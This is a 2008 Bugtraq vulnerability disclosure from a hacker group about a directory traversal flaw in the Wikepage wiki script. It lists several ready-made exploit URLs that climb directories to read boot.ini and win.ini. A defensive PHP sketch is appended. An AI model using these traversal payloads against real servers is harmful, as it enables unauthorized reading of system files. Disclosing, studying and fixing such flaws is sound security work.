Message-ID: <20080407093312.5088.qmail@securityfocus.com>
Date: 7 Apr 2008 09:33:12 -0000
From: virangar_nml@...oo.com
To: bugtraq@...urityfocus.com
Subject: Wikepage Opus 13 2007.2 Directory Traversal Vulnerability

	     ##############################################################################
             #                                                                            #
             #  ...:::::Wikepage Opus 13 2007.2 Directory Traversal Vulnerability ::::.... #
             ##############################################################################

## AUTHOR :  Virangar Security Team (A.Nosrati ) 
## Email  :  Virangar_nml@...oo.com or 9120000000@...oo.com  or Virangar_SECRET@...mail.com
##ICQ:       445117030 
## Script : Wikepage Opus 13 2007.2
## Type Of Bug : Directory Traversal

Virangar Security Team
VIRANGAR UNDER GR0UND TEAM 
 
Special tnx to:HadiHadi,black.shadowes,MR.hesy,IGI,Night_Fox,Kasra515,Gholonbeh_MS

& all Virangar Members .........................

Greetz:Ali007;Kouros_Virus2005 ........
-----------------------------------
Web Site :  http://www.wikepage.org/ 
(Download http://sourceforge.net/project/downloading.php?groupname=wikepage&filename=wikepage2007_2.zip&use_mirror=puzzle)

-----------------------------------
Vulnerability Path : 

vuln code in [localhost]/wikepage/index.php
Sample Of vulnerable Line : $templatefile=$_GET['template'];  (Line 586) And More .....


Exploit :
http://localhost/wikepage/index.php?wiki=template=../../../../../../../../boot.ini  
or 
http://localhost/wikepage/index.php?wiki=Admin=../../../../../../../../boot.ini
or
http://localhost/wikepage/index.php?wiki=Recent_changes=../../../../../../../../boot.ini
or 
http://localhost/wikepage/index.php?wiki=Recent_changes=# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c/boot.ini
or 
http://localhost/wikepage/index.php?wiki=Recent_changes=..\..\..\..\..\..\..\..\WINDOWS\win.ini
and more ........


Good Luck 
Virangar.org ( Coming Soooooooooooooooooooooon::::::::::::::::::)
Are U Ready hummmmmmmmmmmm???!!!!!!!!!!
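
A defensive sketch for the pattern reported above (a request parameter used directly as a template path), added here as an example; it is not Wikepage's code and not from the advisory's author. The function name resolve_template(), the template directory and the ".html" extension are assumptions; the rejected inputs mirror the shapes of the sample URLs in the post.

```php
<?php
// Added example, not Wikepage code. resolve_template(), the template
// directory and the ".html" extension are assumptions for illustration.

function resolve_template(string $requested, string $templateDir): ?string
{
    // Accept only a bare name: no dots, slashes, backslashes, '%' or NUL.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $requested)) {
        return null;
    }

    $base = realpath($templateDir);
    if ($base === false) {
        return null;
    }

    // realpath() resolves ".." and symlinks; it returns false if the file is missing.
    $path = realpath($base . DIRECTORY_SEPARATOR . $requested . '.html');
    if ($path === false || !is_file($path)) {
        return null;
    }

    // Containment check: the resolved path must still sit under the base directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: a temporary template directory holding one template.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'tpl_demo_' . getmypid();
@mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'default.html', '<html></html>');

// Constructed inputs; the last three follow the shapes in the advisory's URLs.
$inputs = ['default', '../../../../boot.ini', '..\\..\\WINDOWS\\win.ini', '%2e%2e%5cboot.ini'];
foreach ($inputs as $in) {
    $result = resolve_template($in, $dir);
    printf("%-26s => %s\n", $in, $result === null ? 'rejected' : 'allowed');
}

// Clean up the demo files.
unlink($dir . DIRECTORY_SEPARATOR . 'default.html');
rmdir($dir);
```

The allowlist on the name does most of the work; the realpath() containment check is a second layer that still holds if a symlink inside the template directory points elsewhere.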
